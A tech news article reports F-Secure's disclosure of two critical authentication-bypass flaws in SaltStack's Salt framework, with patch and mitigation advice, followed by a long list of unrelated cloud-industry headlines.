A series of critical vulnerabilities in SaltStacks open source Salt remote task and configuration framework will let hackers breeze past authentication and authorisation safeguards to take over thousands of cloud-based servers if left unpatched.
Salt is used in infrastructure, network and security automation solutions and is widely used to maintain datacentres and cloud environments. The framework comprises a master server acting as a central repository, with control over minion agents that carry out tasks and collect data.
The two vulnerabilities, which are assigned designations CVE-2020-11651 and CVE-2020-11652, were uncovered by F-Secure researchers in March 2020 while working on a client engagement.
They affect all versions of Salt up to 3000.1, and are considered so severe that they carry a Common Vulnerability Scoring System (CVSS) rating of 10, the highest possible.
Successfully exploited, they enable attackers to execute code remotely with root privileges on Salt master repositories, meaning they could, for example install backdoors into systems, carry out ransomware attacks, or take over systems to mine cryptocurrencies. F-Secure said it had already found 6,000 such repositories openly vulnerable on the public internet.
F-Secure principal consultant Olle Segerdahl said this meant the vulnerabilities were particularly dangerous and urged Salt users to download two new patches versions 3000.2 and 2019.2.4 that were issued by SaltStack on 29 April 2020, prior to the co-ordinated disclosure.
Patch by Friday or compromised by Monday, said Segerdahl. Thats how Id describe the dilemma facing admins who have their Salt master hosts exposed to the internet.
Patch by Friday or compromised by Monday thats how Id describe the dilemma facing admins who have their Salt master hosts exposed to the internet Olle Segerdahl, F-Secure
Segerdahl said the 6,000 Salt masters he found during the course of his research, which are popular in environments such as Amazon Web Services (AWS) and Google Cloud Platform (GCP), were of particular concern.
I was expecting the number to be a lot lower. There are not many reasons to expose infrastructure management systems, which is what a lot of companies use Salt for, to the internet, he explained.
When new vulnerabilities go public, attackers always race to exploit exposed, vulnerable hosts before admins patch or hide them. So if I were running one of these 6,000 masters, I wouldnt feel comfortable leaving work for the weekend knowing its a target.
Even though the publicly accessible Salt masters are highly at risk of exploitation, Segerdahl added that hosts hidden from the internet could still be exploited easily if attackers have already accessed their target organisations network in some other manner.
Organisations using Salt should take advantage of SaltStacks automated update capabilities to make sure their systems are patched as soon as possible. Those with exposed Salt hosts can use additional controls to restrict access to Salt master ports 4505 and 4506 on default configurations or at the very least block them from the public internet. SaltStacks website carries further guidance on how to do this.
Segerdahl said that looking on the bright side, he had found no evidence or reports of anyone exploiting the vulnerabilities in real-world attacks although it is very important to note that following disclosure this will likely change in short order.
F-Secure pointed out that any reasonably competent hacker should be able to create a 100% reliable exploit for the vulnerabilities within the next 24 hours due to this, the firm has not provided any proof-of-concept exploit code, as this risks harming Salt users who are slow to patch.
It is also possible for Salt users to detect attacks exploiting the vulnerabilities, said Segerdahl. Concerned organisations can and maybe should search the master host systems for any signs of intrusion the Salt master repository records scheduled jobs which defenders can examine.
Further details on the vulnerabilities can be found in F-Secure Labs advisory notice.
- Three Reasons Why You Should Invest in Cloud-based Email - My TechDecisions - TechDecisions - November 4th, 2020
- No way to go but up as cloud solutions shape the future of business - CNN Philippines - November 4th, 2020
- The global cyber insurance market is expected to reach a value of $70,671.9 million by 2030, from $5,573.2 million in 2019 - Yahoo Finance - November 4th, 2020
- Moving to cloud-native applications and data with Kubernetes and Apache Cassandra - JAXenter - November 4th, 2020
- How Digital Twins Accelerate the Growth of IoT - IoT For All - November 4th, 2020
- Bluebeam expands its global Studio data infrastructure - Planning, BIM & Construction Today - November 4th, 2020
- The journey to a cloud BSS - Ericsson - November 4th, 2020
- Edge computing strategies will determine the next cloud frontier - TechTarget - November 4th, 2020
- How do we protect the hybrid workplace? - TechHQ - November 4th, 2020
- Evolution of File Sharing and its method - InfotechLead.com - November 4th, 2020
- Amazon: The Coming Graviton3 - Seeking Alpha - November 4th, 2020
- Windows Admin Center is Coming to the Azure Portal - Petri.com - November 4th, 2020
- Sophos Uncovers Attackers Targeting Non-Governmental Organizations in Myanmar With New 'KilllSomeOne' Backdoor - GlobeNewswire - November 4th, 2020
- IBM Delivered An RDi Update, Too - IT Jungle - November 4th, 2020
- Racksquared Is Another Option For IBM i Private Cloud - IT Jungle - November 2nd, 2020
- United States Data Center Construction Markets, 2020-2025 - Growing Cloud Applications, AI, and Big Data & Rising Adoption of Hyperscale Data... - November 2nd, 2020
- Impact of Covid-19 on Private Cloud Server Market 2020 | Enormous Growth with Recent Trends & Demand By Top Vendors AT&t, Sprint Corporation, Verizon... - November 2nd, 2020
- Does Google Workspace Replace Exchange and Active Directory? - Security Boulevard - November 2nd, 2020
- Private Cloud Server Market Report 2020 Industry Size, Share, Growth, Trends, Impact Of Covid-19 on Sales Revenue, Business Strategies, Key Countries... - November 2nd, 2020
- What Is the R.U.D.Y. Attack - Security Boulevard - November 2nd, 2020
- Serial Console Server Market to Exceed US$ 37 Million by 2030 North America Latin America Europe East Asia South Asia Oceania MEA to Remain the... - November 2nd, 2020
- Private Cloud Server Market Report, History And Forecast 2020-2026, Breakdown Data By Manufacturers, Key Regions, Types And Application - The Think... - November 2nd, 2020
- MJFChat: The Role of the IT Pro in a Microsoft 365 Cloud World - Petri.com - November 2nd, 2020
- Wiwynn EP100 Participated in the Second Global O-RAN ALLIANCE Plugfest with Radisys - Business Wire - November 2nd, 2020
- Zerto beefs up backup, DR and in-AWS-cloud protection Blocks and Files - Blocks and Files - October 17th, 2020
- What is Elasticsearch and why is it involved in so many data leaks? - TechRadar - October 17th, 2020
- How to move your computer systems to the cloud - KnowTechie - October 17th, 2020
- What is application hosting? - Techradar - October 17th, 2020
- The Role of Hybrid Cloud Technologies in Today's Business Climate Wall Street Call - Reported Times - October 17th, 2020
- IBM Goes All-In On Hybrid Cloud - IT Jungle - October 17th, 2020
- Is your college in a severe wildfire zone? - CALmatters - October 17th, 2020
- Fujitsu Verifies Effectiveness of Private 5G in Manufacturing Sites with Microsoft Japan - Latest Digital Transformation Trends | Cloud News - Wire19 - October 17th, 2020
- New Neoverse Platforms Take on the Cloud, HPC, and the Edge - Electronic Design - October 17th, 2020
- IBM shares rise on plans to spin off its IT infrastructure unit and focus on the cloud business - CNBC - October 8th, 2020
- Carhartt shifts old data to the cloud with Komprise - ComputerWeekly.com - October 8th, 2020
- Global Cloud Identity and Access Management (IAM) Industry - PRNewswire - October 8th, 2020
- Smart Home Cloud Platform Market is anticipated to exhibit an impressive CAGR of around 17% during 2020 to 2030, Reports PMR - PRNewswire - October 8th, 2020
- Why Africa Needs to Take Advantage of the Cloud - IT News Africa - October 8th, 2020
- Vulnerabilities in HashiCorp Vault could lead to authentication bypass - The Daily Swig - October 8th, 2020
- Corporate payments without corporate cards - ThePaypers - The Paypers - October 8th, 2020
- Leaseweb Global Expands Veeam Backup Integration to Global Entities - HostReview.com - October 8th, 2020
- What is Google Cloud certification and should I get it? - Android Authority - October 8th, 2020
- Esri Announces New Security Enhancements through Integration of US Government-Approved Drone and Cloud Deployment to the European Union - sUAS News - October 8th, 2020
- Giving Was Strong the First Half of the Year. Will That Continue? - The Chronicle of Philanthropy - October 8th, 2020
- Three Advantages Of Using Cloud Computing In Business - CIO Applications - October 5th, 2020
- How secure is the cloud in 2020? - Techerati - October 5th, 2020
- Cloud computing is betting on outer space - Mint - October 5th, 2020
- VMware wants to play nice with Nvidia DPUs Blocks and Files - Blocks and Files - October 5th, 2020
- Industry Groups Spar Over NDAA Provisions on Sourcing of Electronics from China - Nextgov - October 5th, 2020
- Hewlett Packard Enterprise Becomes the Only Major Server Manufacturer to Ship World's Most Secure Industry-Standard, Made-in-USA Servers - Business... - October 5th, 2020
- Privacy, civil rights groups demand transparency from Amazon on election data breaches | TheHill - The Hill - October 5th, 2020
- What is the Importance of ROI in Enterprise Application Integration? - CIOReview - October 5th, 2020
- Top 5 Questions When Moving To The Cloud | How To Scale - Industry Analysts Inc - October 5th, 2020
- Anticipating The Accessibility Of The Amazon One Payment System - Forbes - October 5th, 2020
- Intel Xeon Scalable Technology Boost InMotion's Server Capabilities - AiThority - October 5th, 2020
- Tackling The Security Challenges Of A New Remote Working Reality - ISBuzz News - October 5th, 2020
- Three wireless gadgets that give you bang for your buck include waterproof earbuds, outdoor camera - The Dallas Morning News - October 5th, 2020
- Importance of Financial Governance in the Cloud - Analytics Insight - September 22nd, 2020
- Risks and opportunities in hybrid cloud storage - Process & Control Today - September 22nd, 2020
- How cloud threat protection takes on shadow IT - CIO Dive - September 22nd, 2020
- Cloud Analytics Market worth $65.4 billion by 2025 - Exclusive Report by MarketsandMarkets - Yahoo Finance - September 22nd, 2020
- How the Pandemic Opened the Door for Data Opportunities in the Cloud - StateTech Magazine - September 22nd, 2020
- Why Financial Market Data is Moving to The Cloud - Institutional Investor - September 22nd, 2020
- What Is QuickBooks Server Hosting and Who Should Use It? - Loop21 - September 22nd, 2020
- Low latency is the name of the game for IoT. Can your network keep up? - Techgoondu - September 22nd, 2020
- Why Snowflake Is Freezing Out Its Competition - Morning Brew - September 22nd, 2020
- Best things to look at in a VPS web hosting - Techiexpert.com - TechiExpert.com - September 22nd, 2020
- Global Cloud Based Collaboration Software Market : Industry Analysis and Forecast (2020-2027) By Deployment Type, Service, Solution, Enterprise Size,... - September 22nd, 2020
- Bringing the power of embedded analytics to your apps and services with Amazon QuickSight - idk.dev - September 22nd, 2020
- Qovery lets you deploy your application without managing your cloud infrastructure - TechCrunch - September 10th, 2020
- Actifio pushes cloud DR that accelerates slow object storage to near SSD speed - Blocks and Files - September 10th, 2020
- Not Just in the Cloud: Serverless in Your Own Data Center - Data Center Knowledge - September 10th, 2020
- Why Public Cloud Data Center Spending Is At An All-Time High - CRN: Technology news for channel partners and solution providers - September 10th, 2020
- Data Virtualization Cloud Market to Grow at an Exceptional CAGR of 25% as IT Sector Shift Towards Cloud-based Operations: Future Market Insights -... - September 10th, 2020
- NETINT Deploys Video Transcoding Technology in the Nimbix Cloud - HPCwire - September 10th, 2020
- Cybercriminals Are Using Legit Cloud Monitoring Tools As Backdoor - The Hacker News - September 10th, 2020
- HPE, Dell In Dead Heat In Server Market-Share Battle In 2020 - CRN: Technology news for channel partners and solution providers - September 10th, 2020
- Inspur Information Unveils inMerge HCI Systems Targeting AI, Edge and Cloud Computing - Business Wire - September 10th, 2020
- Northern Virginia remains the King of the Cloud - WTOP - September 10th, 2020
- Wolters Kluwer Outlines Cloud-native Technologies for Optimizing Financial Services Operations in New White Paper - Business Wire - September 10th, 2020